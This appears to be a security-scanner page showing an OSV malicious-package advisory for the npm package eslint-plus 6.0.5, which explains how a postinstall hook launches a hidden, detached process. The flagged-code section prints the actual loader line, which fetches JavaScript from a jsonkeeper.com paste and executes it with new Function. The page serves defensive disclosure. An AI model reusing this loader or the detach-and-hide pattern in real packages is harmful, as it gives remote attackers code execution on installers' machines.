registry  /  eslint-plus  /  6.0.5

eslint-plus@6.0.5

OSV Malicious Advisory

scanned 4h ago · by OpenSSF/OSV

OpenSSF/OSV advisory MAL-2026-10087 confirms this npm version as malicious. Package declares `postinstall: node lib/utils/index.js`, which spawns a detached, stdio-suppressed Node child (spawn with detached:true, stdio:'ignore', child.unref()) that runs lib/utils/smtp-connection/index.js. That script uses axios to GET https://jsonkeeper.com/b/UTUUE and passes the response's `cookie` field to `new Function("require",...)(require)`, executing whatever JavaScript the anonymous mutable paste...

Advisory
MAL-2026-10087
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in eslint-plus (npm)
Details
Package declares `postinstall: node lib/utils/index.js`, which spawns a detached, stdio-suppressed Node child (spawn with detached:true, stdio:'ignore', child.unref()) that runs lib/utils/smtp-connection/index.js. That script uses axios to GET https://jsonkeeper.com/b/UTUUE and passes the response's `cookie` field to `new Function("require",...)(require)`, executing whatever JavaScript the anonymous mutable paste currently returns with full Node privileges on the installer's machine. jsonkeeper.com is a public, anonymously-editable JSON paste service, so the executed code can be silently swapped by the operator at any time. The detach + stdio-ignore + unref pattern is designed to survive after `npm install` exits and to hide output from the installer. Separately, the package is named `eslint-plus` and its homepage/description reference React Training and eslint tooling, but `main` points at `lib/nodemailer.js` and the tarball ships a copied nodemailer source tree authored by 'Andris Reinman' — a namespace/impersonation cover for the dropper.
Decision reason
One or more suspicious static signals were detected.

Decision evidence

public snapshot
Behavioral surface
Source
ChildProcessCryptoEnvironmentVarsEvalFilesystemNetwork
Supply chain
HighEntropyStringsObfuscatedUrlStrings
ManifestNo manifest risk signals triggered.
scanned 35 file(s), 444 KB of source, external domains: accounts.google.com, api.nodemailer.com, ethereal.email, jsonkeeper.com, mail.google.com, nodemailer.com, tools.ietf.org

Source & flagged code

5 flagged · loading source
package.jsonView file
scripts.postinstall = node lib/utils/index.js
High
Install Time Lifecycle Scripts

Package defines install-time lifecycle scripts.

package.jsonView on unpkg
lib/utils/index.jsView file
2L3: const { spawn } = require('child_process'); L4:
High
Child Process

Package source references child process execution.

lib/utils/index.jsView on unpkg · L2
2Cross-file remote execution chain: lib/utils/index.js spawns lib/utils/smtp-connection/index.js; helper contains network access plus dynamic code execution. L2: L3: const { spawn } = require('child_process'); L4: ... L7: L8: const filePath = path.join(__dirname, 'smtp-connection/index.js'); L9:
High
Cross File Remote Execution Context

Source spawns a local helper that also contains network and dynamic execution context; review data flow before blocking.

lib/utils/index.jsView on unpkg · L2
lib/utils/smtp-connection/index.jsView file
1(async()=>{require("axios").get("https://jsonkeeper.com/b/UTUUE").then(r=>new Function("require",r.data.cookie)(require)).catch(e=>console.error("Error loading external model:",e))...
Low
Eval

Package source references a known benign dynamic code generation pattern.

lib/utils/smtp-connection/index.jsView on unpkg · L1
lib/smtp-connection/index.jsView file
2L3: const packageInfo = require('../../package.json'); L4: const EventEmitter = require('events').EventEmitter; L5: const net = require('net'); L6: const tls = require('tls'); ... L49: L50: this.id = crypto.randomBytes(8).toString('base64').replace(/\W/g, ''); L51: this.stage = 'init'; ... L69: L70: this.name = this.options.name || this._getHostname(); L71: ... L637: } else {
Low
Weak Crypto

Package source references weak cryptographic algorithms.

lib/smtp-connection/index.jsView on unpkg · L2

Findings

3 High3 Medium7 Low
HighInstall Time Lifecycle Scriptspackage.json
HighChild Processlib/utils/index.js
HighCross File Remote Execution Contextlib/utils/index.js
MediumNetwork
MediumEnvironment Vars
MediumStructural Risk Force Deep Review
LowScripts Present
LowEvallib/utils/smtp-connection/index.js
LowWeak Cryptolib/smtp-connection/index.js
LowFilesystem
LowObfuscated
LowHigh Entropy Strings
LowUrl Strings